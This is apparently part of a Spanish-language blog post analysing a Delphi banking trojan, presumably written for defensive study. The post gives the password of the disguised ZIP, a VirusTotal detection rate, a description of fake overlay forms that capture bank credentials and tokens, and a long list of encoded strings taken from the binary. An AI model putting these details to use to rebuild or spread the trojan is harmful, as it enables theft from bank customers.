<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">El archivo descargado (.jpg) corresponde a un .ZIP con password.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoq4EsHB70zvYQHHRRAUQ_y8JJ7XQ95LQyVFXvrZfbQ9YtF7mZGdpHUU_Y34_i1fnbq42PlwwuhSjqigI2oBRWyBv3L7Zp5ruKCbfrI39Llr5WcXiu3UC0ai0APfCjToxZPh3_e09PhQM/s1600/03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="118" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoq4EsHB70zvYQHHRRAUQ_y8JJ7XQ95LQyVFXvrZfbQ9YtF7mZGdpHUU_Y34_i1fnbq42PlwwuhSjqigI2oBRWyBv3L7Zp5ruKCbfrI39Llr5WcXiu3UC0ai0APfCjToxZPh3_e09PhQM/s640/03.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7Ebr-A0q_Z2SOE3tF6bZUk_V-MpWy-3xwMBAtyxSqbJXVZBtSoc9aDb2PmQ9IpDwziyaUozz0NCsLd1G5nTd10MwIegv-WW9vn8dl-4DcXI8q3C6_hZM1ioOGf10cL1lYdgLFshOci1g/s1600/02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7Ebr-A0q_Z2SOE3tF6bZUk_V-MpWy-3xwMBAtyxSqbJXVZBtSoc9aDb2PmQ9IpDwziyaUozz0NCsLd1G5nTd10MwIegv-WW9vn8dl-4DcXI8q3C6_hZM1ioOGf10cL1lYdgLFshOci1g/s640/02.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Trafico</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2tcCMo1w5AcX7FDeWQxfF4RZGapEgYhpG_1k00qqvyvQepWjYz_PDNSe45GuuqXTAa0kELxN-X-b2sYz9FXH451ZheRXkIP4GBCEkr2aRZmo4P4QzEpMlrPUhy-Nth_C3rFs5c-C-suE/s1600/04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="324" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2tcCMo1w5AcX7FDeWQxfF4RZGapEgYhpG_1k00qqvyvQepWjYz_PDNSe45GuuqXTAa0kELxN-X-b2sYz9FXH451ZheRXkIP4GBCEkr2aRZmo4P4QzEpMlrPUhy-Nth_C3rFs5c-C-suE/s640/04.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">La password del ZIP esta ofuscada en el binario.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">\temp.zip</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Scripting.FileSystemObject</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: large;"><b>102030</b></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Analizamos en VT el Payload (reader.exe) con un indice de detecciones 3/57</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjztzdAS-77FNFVfVZNwTAIsOwymMIgWu9uPHp5atGTI2XMX-jtz_ByRcsDdiVSliXcgBhAyzm9vbI8MevwY7sB_F4zXlChb5CmKHSNCzWHX8PBWeGVwkrDLJEkg8zq3AZGPld3e6ExXUg/s1600/vt2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjztzdAS-77FNFVfVZNwTAIsOwymMIgWu9uPHp5atGTI2XMX-jtz_ByRcsDdiVSliXcgBhAyzm9vbI8MevwY7sB_F4zXlChb5CmKHSNCzWHX8PBWeGVwkrDLJEkg8zq3AZGPld3e6ExXUg/s400/vt2.jpg" width="400" /></a></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Se encuentra ofuscado con el mismo cripter que el Dropper.</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZW9eO1M5rdh9K7IgVi7nQL7MZnvvG50yrdkKga15bHnpo0nXG2YE9YQOxQHWUWtlKU53p6YEPf2qszGn6oCaGToSci65YC-89Je3Hus2ReHPunO1mV9G90TOZRFXWF1TCijKAw69K2zs/s1600/07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZW9eO1M5rdh9K7IgVi7nQL7MZnvvG50yrdkKga15bHnpo0nXG2YE9YQOxQHWUWtlKU53p6YEPf2qszGn6oCaGToSci65YC-89Je3Hus2ReHPunO1mV9G90TOZRFXWF1TCijKAw69K2zs/s400/07.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Corresponde a un binario programado en Delphi, el cual monitorea las URLS que son visitadas en el navegador cunado corresponde con alguna de las que tiene codificadas, mostrara un formulario falso para la captura de los datos bancarios/tokens virtuales de la victima.</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Cadenas codificadas en el binario.</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CEBB5788B0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2E2F29</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BB46F1639A3365</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6FFF2F7FA8124D84B19E</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">482F3F9E5FFD281D</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2434ED639D</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">768DBB19C53886AF94B663FC</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CC6682DF1C52FC261DD80E4A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">8E96A0D952AD3B38C15DED1B3545</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2132DE7CA0FD4EF32D</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">5BE812B751</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A3B168FE3F85D00725CE508DAA2EAF66E219CE73FD36F165E46A9ABF33E464E00239E275EE3B9D35E16793A64485</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C650D81C23495AEA64C8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">23215CF0164E8BEF1031DB7FAB2AB95BFD4E7BC31AD905D572ED15CDDD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">DF77F17584E83A3FDB60E53D</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ABAB56F92FAE26DE1DC06EBA7AD509389DC27283D162D772D00137E07E93C410741778AD28C49530DC7687E4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1E2B6FEC1EA325012CDEB212A127A24D5A9341FF589B5C8EC20463041431AC15B256F019BC86</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CB5BD519204451E164C8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">83949CDF7FE53FC95438</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">36CD74EF19B4E2083FEA16BC70E275A1F6B093A424CBF8568FC572</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CB5BD519204451E164C8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">97AC55F01ABBED13C86083C175E578A2F58FEC0E4B9027A03AA85F36</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">60F770F30B5142D257E57FE650</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">97AC55F01ABBED13C86083C175E578A2F58FEC0E4B9027A03AA85F36</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6AFD76F9016BB8BD58E462B1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">DC5985C87EDF77AF6C91BEEA0A4598488DD20233A15227A322BE699230DD71E44162CD7BDD0EDC7BA131C2A1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CA5CD418274D46DE63C9</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">E979A13DEE6EB8669D4BF65D90C215C1D690F30544EB9836AF22D6BF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F0060E51E873A0A0BD432A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">EA73A83FE266E503A34AF522DC71A3A233F71A627BCA61FC431338E87D92</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">05121A5DFC67BC54EB6DDC</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">EF0420BE6BFF163BE0083B995D8DC360B7F151E2668D3A95CE0521</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">192E2649D01B08181379</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">53D18CC066FE583CEC1436915EF86889CFBFEA538BA84A1FBB1330D6</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">9DAAA2C5559FF40D117B</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">D60712B15185C5A142FF2AAD7AD4042DAB9BC6BE1FDC06D471EC163E6E</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">EE7FA43BE66AE107A7D274D3A93D90F57EB358953FF1352EBF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">31C370EE7CC0030325C97ADD1F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">D6679C21CA0E4AEB2906074BE17DDE144E90</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">99FB66A893F91C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">3C39E76CAC2FAB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">65E10FB557FA590027C563F04B9C30155F94B876DF102B20B1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BB47F95C8DC30E2739CE6A8C8A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">62E21EA041BC1ACA7DAC6A89A824BD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">8097B518C90042EF2B</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">66F17AFD1D475CEB73E646</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">35CF7CDA0F4355FA20C975D31B4F81A7F08AE90B4E9522BD174DE9</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">E97DF77B82EA38C85DCF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">39E573D272E465C1629F4A8D5AF4648DCBBBE65FFF3FE0F16EE1012B7B</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C650D81C23495ADA66FB53</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">53DB035984C5052243EB17033D918382D4193901DDAC4382C89C4EFE53F8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F70F195CE3081D34CB4D3C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A3B15EFC29B9EF1DC2669938FF5284A0F7B192A325CAF9558EC461</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">96A1ABCE6EF62CC44E3E</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">60E491C563F95F3BED13359059F5658CCCBCE55EF00ED180DC70934A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">24333DA0BF24718185E7</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2BD361E00056F25789B853F63393C66EEA5B067ED06EB1A03D90B35C4C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">24333DA0BF2471F10F1279</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">59E51DB36FD2769332DC001422B4E66EF83DDDA5B889A725ABBB6F91C56B</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1A2D274AD11A0B1A211877</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CA59F756F267B15F84A559FF37AB22C6D1EB4FE078BFF4528BD97C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">46D15A9DBC277C9496F6</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">81AD4B8AB92CAC88B86882C562FC6C953202A890CE6CB7AA27A64CE435</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">E77CA827C316002DD279A423CF0648EC2E1EC46BE90221B1E166924091B22BAF608CF5</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">66F17AFD1D475CEB73E646</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A6B1BB3FDE051E353638C23009</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">59EE79FC1C4055EC72E545</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C75FE90D2CB0E563FF1C2978</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C75FE90D2CB0E563FF1C2978</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2C3B35B840A4F10106060B69F728</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001430AE5B8F9947FC2CD77EB120B65D4A64C769E006B22CA53CDA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">06111B5EFD66BF50D2BA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BC568CC761FC2BD076934FF539A93CEE3872D163E60CB8164F85B39A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">FB0B0568F77CA9B84EDE7DE553</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">D56E9A39ED7CAA4AE616C60430AA3CD80A290A2BAE44E66AE77FA44F5F051649F3234AFA50EE63</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">5EE9628594D8CD66E14A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A4A04091449A8CB16980A322D5045AFE284221D276BDCA045DF71E77</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C857D0111155AAB74F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">41D35E9E93E4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C857D0111155AAB74F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">41D35E9E93E4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C857D0111155AAB74F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">41D35E9E93E4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C548FF44E56BEF11CCA3A429C30340F76A8C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">5AC0AAE7</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">B7A38F8C99ED</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">818FB71732AD25010D3AE0648BC3</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CDBDA9E6668B</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2928D87BAC20B976</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">47331F7C8EE7</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A75288C866EB7BA05D83FD45FC40974E4C90BB79915895C5025183F86C9736</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1BC0B8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">FF14CA013983D2012FC45EF30D4C89B91ED40A3EB04E97CF72D67BA6F670DB7AA25B82AB2ADC1ABB76FF35DF11B379BE0B57AF5BF56998C919CF0BCB64E44C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">03342C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">061EC41BC3085F95B35FE07EBB1DBE77D1689FA3DB1BDA73D572904C5CED55F324DA022BA95C9B39F57FB45F9033F63C86D223C863F62EA33FF521D57EDA56</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">46F16D</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">778DB52CEC578E45E30F104DEA6EEF26A2598EB2CC6A8BC30642E01C0C1DA621C970AD5FE51857F4294CE10A2BA94F943DA9DD0D27BA6AFF5381BA7B9B3830</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">8FB55788B22B</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">E3738BE97D93</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">203</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">233434B2B5</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">050F1755E01153D252</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">353FD8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A1ADBB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">07132F46254887BE7D91B12FF3667C25A39397548A50E47AEB39</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">E46D8CE1698DD75DE4788B</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">9294A1C644A3DA71FB03195C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">B444DA011C5B92A4A6</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A7B24B919EC22530CB6FFC64</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">8F9CACCA5A99DE75808EAD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">4FDC6F8D94EB0709</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1BC0B8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">FF14CA013983D2012FC45EF30D4C89B91ED40A3EB04E97CF72D67BA6F670DB7AA25B82AB2ADC1ABB76FF35DF11B379BE0B57AF5BF56998C919CF0BCB64E44C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BB4BD316265491919FAA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">03342C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">061EC41BC3085F95B35FE07EBB1DBE77D1689FA3DB1BDA73D572904C5CED55F324DA022BA95C9B39F57FB45F9033F63C86D223C863F62EA33FF521D57EDA56</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">46F16D</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">778DB52CEC578E45E30F104DEA6EEF26A2598EB2CC6A8BC30642E01C0C1DA621C970AD5FE51857F4294CE10A2BA94F943DA9DD0D27BA6AFF5381BA7B9B3830</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0E1D2F4DD41653E17F8FAEC656AF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">8DA7B232CE1560F07D8A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F2041F43DA2D49</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0D1D39B09FDD789FDC0DCCD867FF1227AE73D8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">EF523265</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6AEC1BBD619532D77390B92A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">9591BF023DB22EE50E3FE779</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">82919FD253A7DD69</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">33C459</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">46DE63</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">D56EFE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">202A344B225EF52B32EB1DA44251AC59F93DE15A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">52D8659CF30C47849D5F88CF190A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">7C8884E26B8CE704110C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">46D46198F773E21530D375A1B417BE77EB5F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BA4FEB036A81D40722C16BBF5486CE71EF0126CD77C6BC</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0C081E5AD7195BF705</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CB5EF870DF1B4AFC28DB0D193DAD163E92A34BE262D4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">31C65F829AD62AC7</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F9001A5138BB3DD460E4668BF1095883D06D91E9003EE669FE14</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0416205736B533C25EE6608DF773E61043FF261E5BED31A53DA84AF0533A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6D8785E3649CD775</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">4AD06D84EB0C67F17F8586EB56AD3DEE6480A69EDB6CB72EA531D20B4D3C</span></div>
<div class="separator" style="clear: both;">
